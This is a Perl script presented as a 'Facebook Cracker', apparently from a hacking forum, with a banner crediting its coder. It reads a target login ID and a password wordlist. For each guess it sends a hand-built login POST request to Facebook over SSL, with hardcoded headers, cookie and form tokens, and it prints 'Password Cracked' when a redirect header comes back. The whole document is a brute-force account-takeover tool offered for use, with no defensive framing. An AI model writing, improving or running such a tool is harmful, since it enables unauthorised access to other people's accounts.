Facebook Cracker 2017 [Priv8]

1. #!/usr/bin/perl
2. # Mutinous
3. #
4. #
5.  
6. use strict;
7. use Net::SSLeay::Handle;
8.  
9. if(!defined($ARGV[0] && $ARGV[1])) {
10.  
11. system ("cls");
12. system ("color 0a");
13. print "========================================================================\n";
14. print "
15.    ____     __                   __                                
16.   / __ )   / /  ____ _  _____   / /__ _      __  ____ _  _   __  ___
17.  / __  |  / /  / __ `/ / ___/  / //_/| | /| / / / __ `/ | | / / / __l
18. / /_/ /  / /  / /_/ / / /__   / ,<   | |/ |/ / / /_/ /  | |/ / /___/
19. /_____/  /_/  ____,_/  \___/  /_/|_|  |__/|__/  l__,_/   |___/ l___/
20.    \n";
21. print "=================> Coded By Tunisian coder - Blackwave <================\n";
22. print "\n";
23. print "==========No teams , i work for my own. Copyrights goes to me===========\n";
24. print "\n";
25. print "   Usage: perl $0 [login ID] wordlist.txt \n";
26. print "\n";
27. print "========================================================================\n";
28. exit; }
29.  
30. my $user = $ARGV[0];
31. my $wordlist = $ARGV[1];
32.  
33. open (LIST, $wordlist) || die "\n[-] Can't find/open $wordlist\n";
34.  
35. print "\n
36. XPLOIT 225
37. [Xploit Project]
38. [+] Cracking Started on: $user ...\n\n";
39. print "=======================================\n";
40.  
41. while (my $password = <LIST>) {
42. chomp ($password);
43. $password =~ s/([^^A-Za-z0-9\-_.!~*'()])/ sprintf "%%%0x", ord $1 /eg;
44.  
45. my $a = "POST /login.php HTTP/1.1";
46. my $b = "Host: www.facebook.com";
47. my $c = "Connection: close";
48. my $e = "Cache-Control: max-age=0";
49. my $f = "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
50. my $g = "Origin: https://www.facebook.com";
51. my $h = "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31";
52. my $i = "Content-Type: application/x-www-form-urlencoded";
53. my $j = "Accept-Encoding: gzip,deflate,sdch";
54. my $k = "Accept-Language: en-US,en;q=0.8";
55. my $l = "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3";
56.  
57. my $cookie = "cookie: datr=80ZzUfKqDOjwL8pauwqMjHTa";
58. my $post = "lsd=AVpD2t1f&display=&enable_profile_selector=&legacy_return=1&next=&profile_selector_ids=&trynum=1&timezone=300&lgnrnd=031110_Euoh&lgnjs=1366193470&email=$user&pass=$password&default_persistent=0&login=Log+In";
59. my $cl = length($post);
60. my $d = "Content-Length: $cl";
61.  
62.  
63. my ($host, $port) = ("www.facebook.com", 443);
64.  
65. tie(*SSL, "Net::SSLeay::Handle", $host, $port);
66.  
67.  
68. print SSL "$a\n";
69. print SSL "$b\n";
70. print SSL "$c\n";
71. print SSL "$d\n";
72. print SSL "$e\n";
73. print SSL "$f\n";
74. print SSL "$g\n";
75. print SSL "$h\n";
76. print SSL "$i\n";
77. print SSL "$j\n";
78. print SSL "$k\n";
79. print SSL "$l\n";
80. print SSL "$cookie\n\n";
81.  
82. print SSL "$post\n";
83.  
84. my $success;
85. while(my $result = <SSL>){
86. if($result =~ /Location(.*?)/){
87. $success = $1;
88. }
89. }
90. if (!defined $success)
91. {
92. print "\033[1;31m[-] $password -> Failed \n";
93. close SSL;
94. }
95. else
96. {
97. print "\033[1;32m\n########################################################\n";
98. print "[+] \033[1;32mPassword Cracked: $password\n";
99. print "\033[1;32m########################################################\n\n";
100. close SSL;
101. exit;
102. }
103. }